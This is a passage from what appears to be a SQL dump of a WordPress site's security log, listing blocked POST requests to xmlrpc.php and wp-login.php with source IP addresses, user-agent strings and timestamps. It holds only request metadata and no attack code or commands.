Firefox\\/17.0\"}','pwDOfBjX8qgEFeIUCVdxvt6H',0,1664307893.5724,505,'','POST',403,0,515,0,1,'',0),('51.195.152.172',868456620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','e7XTnzEAyItQWqBmbaC0FrKP',0,1664307914.8536,516,'','POST',403,0,515,0,1,'',0),('149.210.196.253',2513618173,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','JPyM4ArzsQb2gSo0VGmwf95C',0,1664307924.3691,490,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','1nfrusiQ6SMP2ClcvAW8DEBY',0,1664307929.0782,478,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','RTIGSipf2yecbuvjJPYHkL3U',0,1664307931.6602,498,'','POST',403,0,515,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','wnyR72s5QECZmOTgF9KJdMtS',0,1664308530.9773,1249,'','POST',403,0,600,0,1,'',0),('64.90.36.102',1079649382,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','KYwDS2bZy8J3Up1HLd7lTkfm',0,1664308554.8024,1172,'','POST',403,0,600,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','dgGW79uJna3EvAD2t0b8HSep',0,1664308930.4195,1182,'','POST',403,0,515,0,1,'',0),('168.138.1.42',2827616554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','gs6LirnUPN7oFCQpWuymBS1M',0,1664308930.8063,1019,'','POST',403,0,515,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','iPulysXkN5bE7FxQnW0g96BA',0,1664308949.7427,557,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','29O3ghumGnWZBMvU1Yt5F4Ri',0,1664308953.8644,600,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','4rpRmGu2lWntMvx1EAfSgK6L',0,1664308957.5999,539,'','POST',403,0,515,0,1,'',0),('51.195.152.172',868456620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','fw7SKRHM9PyaYtdE4uv0lOkz',0,1664308960.7561,543,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ThrEmQo0gMUYSDeHpi4kcx7d',0,1664308972.5077,1252,'','POST',403,0,515,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Olmntsi9kuRr4DEgxLTSIKGa',0,1664309662.2699,1292,'','POST',403,0,600,0,1,'',0),('213.152.161.170',3583549866,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mwUNe0Ib6pKDY7vPLfaOCHxj',0,1664309679.6433,493,'','POST',403,0,515,0,1,'',0),('47.107.242.103',795603559,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','KuZJWQC50yVkzfFh42d3x6Sn',0,1664310792.6539,17261,'','POST',403,0,600,0,1,'',0),('142.93.201.0',2388510976,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','ldc3Fwy5MRjnx6XkWtTviu1L',0,1664310824.5149,496,'','POST',403,0,600,0,1,'',0),('159.89.109.117',2673438069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','L3vYSnma0Au6VzCqWKfIPeUO',0,1664311925.5331,1324,'','POST',403,0,600,0,1,'',0),('121.243.95.160',2045992864,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','Ws0hYjCfvpBAeESkx9FniRMK',0,1664311947.3419,557,'','POST',403,0,600,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','olTAHXJ0FfiDd7nB5VtLukpZ',0,1664312551.8751,7908,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','uqoMB3A4SepKmi1hfC695JgP',0,1664312545.2870,14522,'','POST',403,0,515,0,1,'',0),('64.227.190.34',1088667170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','SyevufVnp81TxgIrdPLjJC07',0,1664312556.6841,3834,'','POST',403,0,515,0,1,'',0),('162.0.220.27',2717965339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','ZcAtdET9VWbMQmGYfIgzpL2r',0,1664312563.7818,505,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','IPlX5u0ejzphDZkcC7UvEf9F',0,1664312567.0286,1425,'','POST',403,0,515,0,1,'',0),('91.234.195.123',1542112123,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','6tePXzK3cbypwhQnTYumVAro',0,1664312572.2712,569,'','POST',403,0,515,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','60OCuFyrsTe1EcPUKQjLxo7k',0,1664312573.2413,530,'','POST',403,0,515,0,1,'',0),('64.227.190.34',1088667170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Jrgn84Z0Xl1HNo9AiBCSzuIc',0,1664312583.3889,1447,'','POST',403,0,515,0,1,'',0),('3.111.174.159',57650847,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','5E4gx3QVNnYbczlsfD6LGCRP',0,1664312607.5887,490,'','POST',403,0,515,0,1,'',0),('138.68.140.0',2319748096,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','KNS3Z6ABVjQLuiCmp4Ysxlte',0,1664313090.8948,1294,'','POST',403,0,600,0,1,'',0),('124.106.71.219',2087339995,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','kMjIPuwLScAUntR9hJ2iaGKN',0,1664314220.7807,1753,'','POST',403,0,600,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','9hzYUcFZ0kN4mj5CReWtPMpI',0,1664314240.3646,489,'','POST',403,0,600,0,1,'',0),('185.107.112.170',3110826154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dGglSsyjrUJmtP3LwcRhDY2b',0,1664314679.9924,2343,'','POST',403,0,515,0,1,'',0),('92.204.239.12',1556934412,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','WLtB3QE9O2UZp8mHbd4zawPy',0,1664314691.9146,489,'','POST',403,0,515,0,1,'',0),('3.111.174.159',57650847,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','wfs6BI0tTiMFalm4NS3LRrVv',0,1664314697.6298,480,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','4NZ0BVSlsWFuokndM2zThEe1',0,1664314705.7005,492,'','POST',403,0,515,0,1,'',0),('103.8.12.105',1728580713,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','QLuvVSgfHmTnKaXroROwb0B2',0,1664314707.6383,505,'','POST',403,0,515,0,1,'',0),('142.93.36.53',2388468789,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','AeLMI3zqSVCr6hd1JiX4TuRW',0,1664314710.1040,498,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','oNHCZn0aGb5WSFRp7DsdVmAJ',0,1664314715.8106,520,'','POST',403,0,515,0,1,'',0),('128.199.147.151',2160563095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','NIOKcFCqkihb2ofyVJ6ZYQ7G',0,1664314724.9184,549,'','POST',403,0,515,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','u0RUJ8SvXNDcesi29tfkpZby',0,1664315348.0819,1352,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','eEzvaqAbxTRQrsM9IW1j524F',0,1664315372.0886,474,'','POST',403,0,600,0,1,'',0),('45.252.248.52',771553332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','6VRvsuMxAHz0kYUmXbG98geZ',0,1664315404.3079,2686,'','POST',403,0,515,0,1,'',0),('67.227.159.220',1138991068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','rgN9SOPt1IVq6EoKj38hCAFW',0,1664315404.3319,2785,'','POST',403,0,515,0,1,'',0),('123.56.5.185',2067269049,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','INtT31KE92vnojPkpFerZDJf',0,1664315404.0426,3651,'','POST',403,0,515,0,1,'',0),('130.193.9.3',2193688835,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','pRYNPvJwV9sfQ6buTtK4yUBM',0,1664315408.7975,512,'','POST',403,0,515,0,1,'',0),('23.111.168.178',393193650,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','1pYHjfn6Fg8kR3MVz0mEQ4Uu',0,1664315410.7256,486,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','1umHoKBTg605yijk4MUtVDQ8',0,1664315412.9139,507,'','POST',403,0,515,0,1,'',0),('149.210.196.253',2513618173,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','9mwrMGJe2kI6jC3hsKPglWnV',0,1664315414.1866,516,'','POST',403,0,515,0,1,'',0),('172.105.49.155',2892575131,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','AcGCIkbdY4FWgU7NjQHt8iE2',0,1664315415.3759,487,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','zM2ToDC6Uv7ujLGAOXmF81tH',0,1664315417.8996,514,'','POST',403,0,515,0,1,'',0),('87.239.23.107',1475286891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','jWicYM7NKS5skVQnoCx2Upbh',0,1664315421.9103,482,'','POST',403,0,515,0,1,'',0),('204.12.235.139',3423398795,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','1kMDNKWArwqHo06ubZ8IyjtQ',0,1664315424.3085,471,'','POST',403,0,515,0,1,'',0),('13.64.60.246',222313718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','mQ7DL2jeBYVbsE6taqrNXMAI',0,1664315425.9242,543,'','POST',403,0,515,0,1,'',0),('43.153.25.22',731453718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','cQp0THYUmn8sy4WiBtVxS5ER',0,1664315426.9569,514,'','POST',403,0,515,0,1,'',0),('65.2.119.66',1090680642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','pezDlA0yonkuSJIgYhjFZafG',0,1664315431.9959,546,'','POST',403,0,515,0,1,'',0),('168.138.1.42',2827616554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','r6XgP8NKItmVjnSMLJyiTZuw',0,1664318535.4374,506,'','POST',403,0,515,0,1,'',0),('207.180.235.153',3484740505,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','NlsmqyEnphZTaUX4o7GI6wif',0,1664318544.0675,504,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','6EcNJvwtGypAeUBo8TMDhalL',0,1664318551.6553,481,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','5sUcxtNQiV1uJmEKalhIZB7v',0,1664318552.5982,556,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','CHgO8N94WsUTR27Bx1qXQEDt',0,1664318555.7672,483,'','POST',403,0,515,0,1,'',0),('109.235.66.248',1844134648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','9scKYUoV61BATvXlOLq4QnjJ',0,1664318576.7755,1775,'','POST',403,0,515,0,1,'',0),('168.138.1.42',2827616554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','y05qeFXJup3HKgIlxURWfavt',0,1664318582.1399,1454,'','POST',403,0,515,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','a31P47EtKrS8xlbpZn9ujO6H',0,1664318585.3284,516,'','POST',403,0,515,0,1,'',0),('143.244.177.220',2415178204,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','qoLslE1Sw6KDjx3h4nX5WfFa',0,1664318749.3742,1167,'','POST',403,0,600,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','j1Q2VdW987pEmJhZxztbKDno',0,1664318775.4240,468,'','POST',403,0,600,0,1,'',0),('51.75.15.189',860557245,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','OAeJnHEDhiIT291wcQCPRS5M',0,1664319880.8610,17444,'','POST',403,0,600,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','gML9xnmZ8DPIjd7v32orkENA',0,1664319905.0220,678,'','POST',403,0,600,0,1,'',0),('207.180.235.153',3484740505,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','sRG45pSHJfOZk687XDzMmKlv',0,1664320337.1631,5542,'','POST',403,0,515,0,1,'',0),('204.93.193.216',3428696536,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','JgaoY2svZki19NK5djq3eDTz',0,1664320332.8244,9898,'','POST',403,0,515,0,1,'',0),('72.167.77.106',1218923882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','E0q5DSN47nUx2k3XAeBzY8TZ',0,1664320347.4144,800,'','POST',403,0,515,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','4m2kOdUwbBHr91pRFch5aetq',0,1664320348.0326,627,'','POST',403,0,515,0,1,'',0),('51.77.159.184',860725176,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','mE628A3xWBLQUIJRlXeKrcDF',0,1664320366.3567,1301,'','POST',403,0,515,0,1,'',0),('201.236.28.16',3387694096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','e6pLZGJxm9g53cdlED7fNYC2',0,1664320376.0331,529,'','POST',403,0,515,0,1,'',0),('217.146.69.53',3650241845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','7hpr6ANFwHtOsSnCflj8Da2Y',0,1664320378.1245,550,'','POST',403,0,515,0,1,'',0),('207.180.235.153',3484740505,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','wgB4nyeENlm9UC3tbRPXHV7O',0,1664320382.7615,1369,'','POST',403,0,515,0,1,'',0),('51.77.159.184',860725176,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','BaQOcL9jHzfSEgToqCIi2ye3',0,1664320384.3427,538,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','PdG9lhoD4qAVF0L6cwE7XYtp',0,1664321022.3437,17622,'','POST',403,0,600,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','DdIt2yGkFijJCUcKYLBhNxPM',0,1664321045.9931,541,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','BruN1TcAQ3kt0PiE57VxembY',0,1664322156.4592,17055,'','POST',403,0,600,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','FilZ8Gw92t6cSKrfQk3x4UhY',0,1664322180.5868,1226,'','POST',403,0,600,0,1,'',0),('82.156.45.135',1385966983,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ZA3n6BXLROmbqDNTe8HKuUQw',0,1664323209.8042,5574,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','e4sUdr1IYHSzu8apgL7cb5Mi',0,1664323197.5434,17969,'','POST',403,0,515,0,1,'',0),('72.167.77.106',1218923882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','aMpNVlcmrWKSG8RCIPzwk19X',0,1664323215.5084,1348,'','POST',403,0,515,0,1,'',0),('89.46.107.98',1496214370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','dQX4xkC1PgelHWAhbrNR0wan',0,1664323224.0265,564,'','POST',403,0,515,0,1,'',0),('188.166.103.30',3165021982,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 